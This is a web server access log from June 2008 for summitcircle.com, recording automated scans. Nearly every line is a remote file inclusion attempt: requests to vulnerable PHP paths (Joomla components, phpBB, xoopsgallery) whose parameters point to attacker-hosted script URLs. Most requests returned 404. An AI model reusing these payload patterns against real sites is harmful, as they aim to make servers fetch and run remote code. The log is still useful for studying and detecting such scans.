62.140.73.234 - - [08/Jun/2008:18:39:35 -0700] "GET /logs/index1.php?go=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.summitcircle.com"
64.15.129.23 - - [08/Jun/2008:18:39:36 -0700] "GET /logs/index1.php?go=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.summitcircle.com"
64.15.129.23 - - [08/Jun/2008:18:39:36 -0700] "GET /index1.php?go=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.summitcircle.com"
66.135.34.76 - - [08/Jun/2008:18:39:36 -0700] "GET /index1.php?go=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.summitcircle.com"
74.55.227.178 - - [08/Jun/2008:18:39:36 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.55.227.178 - - [08/Jun/2008:18:39:37 -0700] "GET //index.php?option=com_custompages&cpage=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.55.227.178 - - [08/Jun/2008:18:39:37 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.135.34.76 - - [08/Jun/2008:18:39:39 -0700] "GET /logs/index1.php?go=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.summitcircle.com"
160.99.12.231 - - [08/Jun/2008:18:39:42 -0700] "GET /logs/access_071008.log/index.php?body=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
74.53.240.146 - - [08/Jun/2008:18:40:42 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.summitcircle.com"
74.53.240.146 - - [08/Jun/2008:18:40:42 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.summitcircle.com"
74.53.240.146 - - [08/Jun/2008:18:41:07 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "summitcircle.com"
74.53.240.146 - - [08/Jun/2008:18:41:07 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "summitcircle.com"
74.53.240.146 - - [08/Jun/2008:18:41:55 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.summitcircle.com"
74.53.240.146 - - [08/Jun/2008:18:41:55 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:42:16 -0700] "GET /logs/access_080120.log/index2.php?x=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:42:16 -0700] "GET /index2.php?x=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:42:16 -0700] "GET /logs/index2.php?x=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
201.6.121.78 - - [08/Jun/2008:18:42:17 -0700] "GET /logs/access_080406.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
201.6.121.78 - - [08/Jun/2008:18:42:18 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:42:18 -0700] "GET /logs/access_080128.log/index2.php?x=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
201.6.121.78 - - [08/Jun/2008:18:42:18 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:42:30 -0700] "GET /logs/index2.php?x=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:42:30 -0700] "GET /logs/index2.php?x=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:42:30 -0700] "GET /index2.php?x=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:42:30 -0700] "GET /index2.php?x=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:42:38 -0700] "GET /logs/access_080120.log/index2.php?x=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:42:38 -0700] "GET /index2.php?x=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:42:38 -0700] "GET /logs/index2.php?x=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:42:39 -0700] "GET /logs/access_080128.log/index2.php?x=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
202.221.143.111 - - [08/Jun/2008:18:43:06 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:43:18 -0700] "GET /index2.php?x=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:43:32 -0700] "GET /logs/index.php?do=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:43:32 -0700] "GET /index.php?do=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
195.54.9.218 - - [08/Jun/2008:18:43:37 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
70.88.226.121 - - [08/Jun/2008:18:43:49 -0700] "GET /logs/access_071210.log/index.php?body=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.88.226.121 - - [08/Jun/2008:18:43:49 -0700] "GET /logs/index.php?body=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.88.226.121 - - [08/Jun/2008:18:43:52 -0700] "GET /logs/access_071008.log/index.php?body=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:44:18 -0700] "GET /logs/access_070820.log/index.php?do=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:44:18 -0700] "GET /index.php?do=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
213.194.149.28 - - [08/Jun/2008:18:44:18 -0700] "GET /index.php?body=http://powderpuffsquad.com/admin/backups/.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:44:18 -0700] "GET /logs/index.php?do=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:44:21 -0700] "GET /logs/access_070820.log/index.php?do=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:44:21 -0700] "GET /index.php?do=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:44:21 -0700] "GET /logs/index.php?do=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:44:27 -0700] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:44:27 -0700] "GET /logs/access_070826.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:44:27 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.28 - - [08/Jun/2008:18:44:31 -0700] "GET /index.php?body=http://powderpuffsquad.com/admin/backups/.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:44:33 -0700] "GET /logs/access_071021.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:44:47 -0700] "GET /logs/access_070813.log/index.php?do=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
63.247.132.129 - - [08/Jun/2008:18:44:50 -0700] "GET /logs/access_070813.log/index.php?do=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:46:13 -0700] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
193.232.11.93 - - [08/Jun/2008:18:47:20 -0700] "GET /logs/access_071001.log/index.php?go=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
147.32.229.11 - - [08/Jun/2008:18:47:54 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.248.97.34 - - [08/Jun/2008:18:49:19 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.248.97.34 - - [08/Jun/2008:18:49:19 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.248.97.34 - - [08/Jun/2008:18:49:20 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.248.97.34 - - [08/Jun/2008:18:51:27 -0700] "GET /logs/access_071112.log/index.php?go=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.248.97.34 - - [08/Jun/2008:18:51:27 -0700] "GET /index.php?go=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.248.97.34 - - [08/Jun/2008:18:51:27 -0700] "GET /logs/index.php?go=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.248.97.34 - - [08/Jun/2008:18:51:35 -0700] "GET /logs/access_070820.log/index.php?go=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
201.6.121.78 - - [08/Jun/2008:18:53:33 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
201.6.121.78 - - [08/Jun/2008:18:53:33 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
201.6.121.78 - - [08/Jun/2008:18:53:39 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
74.55.227.178 - - [08/Jun/2008:18:54:33 -0700] "GET /logs/access_080519.log//index.php?option=com_custompages&cpage=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:55:23 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:55:24 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.186.117.208 - - [08/Jun/2008:18:55:30 -0700] "GET /logs/access_070903.log//skin/zero_vote/error.php?dir=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.186.117.208 - - [08/Jun/2008:18:55:31 -0700] "GET //skin/zero_vote/error.php?dir=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.186.117.208 - - [08/Jun/2008:18:55:31 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.248.97.34 - - [08/Jun/2008:18:55:31 -0700] "GET /logs/access_070917.log/index.php?site=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.248.97.34 - - [08/Jun/2008:18:55:32 -0700] "GET /index.php?site=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.248.97.34 - - [08/Jun/2008:18:55:32 -0700] "GET /logs/index.php?site=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
201.6.121.78 - - [08/Jun/2008:18:55:56 -0700] "GET /logs/access_080519.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
201.6.121.78 - - [08/Jun/2008:18:55:56 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
201.6.121.78 - - [08/Jun/2008:18:55:56 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.248.97.34 - - [08/Jun/2008:18:55:58 -0700] "GET /logs/access_070820.log/index.php?site=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
201.6.121.78 - - [08/Jun/2008:18:56:00 -0700] "GET /logs/access_080406.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
201.6.121.78 - - [08/Jun/2008:18:56:14 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
80.67.20.50 - - [08/Jun/2008:18:56:34 -0700] "GET //surveys/survey.inc.php?path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.summitcircle.com"
67.195.58.166 - - [08/Jun/2008:18:56:39 -0700] "GET /logs/access_071112.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:56:44 -0700] "GET /logs/access_080127.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:18:56:44 -0700] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.186.117.208 - - [08/Jun/2008:18:57:00 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:58:00 -0700] "GET /logs/access_071210.log/index.php?principal=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:58:00 -0700] "GET /index.php?principal=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:58:00 -0700] "GET /logs/index.php?principal=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
207.7.108.203 - - [08/Jun/2008:18:58:24 -0700] "GET /oneadmin/config.php?path[docroot]=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:18:58:31 -0700] "GET /logs/access_080127.log/index.php?principal=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
213.186.117.208 - - [08/Jun/2008:18:59:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.186.117.208 - - [08/Jun/2008:18:59:52 -0700] "GET //skin/zero_vote/error.php?dir=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
147.32.229.11 - - [08/Jun/2008:19:01:59 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?basepath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
147.32.229.11 - - [08/Jun/2008:19:01:59 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
147.32.229.11 - - [08/Jun/2008:19:01:59 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
78.94.13.51 - - [08/Jun/2008:19:03:32 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
207.7.108.203 - - [08/Jun/2008:19:05:19 -0700] "GET /logs/access_071210.log/oneadmin/config.php?path[docroot]=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
207.7.108.203 - - [08/Jun/2008:19:05:19 -0700] "GET /oneadmin/config.php?path[docroot]=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
207.7.108.203 - - [08/Jun/2008:19:05:19 -0700] "GET /logs/oneadmin/config.php?path[docroot]=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.225.221.84 - - [08/Jun/2008:19:06:53 -0700] "GET /logs/access_080406.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.225.221.84 - - [08/Jun/2008:19:06:53 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.225.221.84 - - [08/Jun/2008:19:06:53 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.130.242.48 - - [08/Jun/2008:19:07:03 -0700] "GET /logs/access_070813.log/index.php?open=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.130.242.48 - - [08/Jun/2008:19:07:04 -0700] "GET /index.php?open=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.130.242.48 - - [08/Jun/2008:19:07:05 -0700] "GET /logs/index.php?open=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:19:07:38 -0700] "GET /logs/access_071112.log/index.php?go=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:19:07:38 -0700] "GET /index.php?go=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:19:07:39 -0700] "GET /logs/index.php?go=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.51.219.170 - - [08/Jun/2008:19:07:41 -0700] "GET /logs/access_070820.log/index.php?go=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
80.67.20.50 - - [08/Jun/2008:19:07:57 -0700] "GET //surveys/survey.inc.php?path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.summitcircle.com"
80.67.20.50 - - [08/Jun/2008:19:07:57 -0700] "GET /logs//surveys/survey.inc.php?path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.summitcircle.com"
87.0.52.88 - - [08/Jun/2008:19:08:22 -0700] "GET /logs/access.log/Scan%20components/com_colorlab/admin.color.php?mosConfig_live_site=%20com_colorlabhhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
202.221.143.111 - - [08/Jun/2008:19:08:22 -0700] "GET /logs/access_071210.log/index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
